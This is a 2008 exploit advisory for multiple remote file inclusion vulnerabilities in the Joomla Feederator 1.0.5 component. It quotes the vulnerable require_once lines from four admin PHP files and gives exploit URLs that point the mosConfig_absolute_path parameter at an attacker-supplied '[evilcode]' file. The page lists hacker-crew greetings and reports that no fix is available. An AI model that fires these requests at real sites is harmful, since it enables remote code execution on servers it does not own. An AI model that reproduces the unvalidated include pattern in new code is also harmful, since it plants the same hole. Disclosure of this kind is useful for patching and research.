Joomla Component Feederator 1.0.5 Multiple RFI Vulnerabilities

2008-11-07 18:01:07

===================================================================================================================================================


[o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities

Software : com_feederator version 1.0.5
Vendor : http://www.recly.com/
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


===================================================================================================================================================


[o] Vulnerable file

administrator/components/com_feederator/includes/tmsp/add_tmsp.php

require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );

administrator/components/com_feederator/includes/tmsp/edit_tmsp.php

require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );

administrator/components/com_feederator/includes/tmsp/subscription.php

require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');

administrator/components/com_feederator/includes/tmsp/tmsp.php

require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );



[o] Exploit

http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]


===================================================================================================================================================


[o] Greetz

MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke


===================================================================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.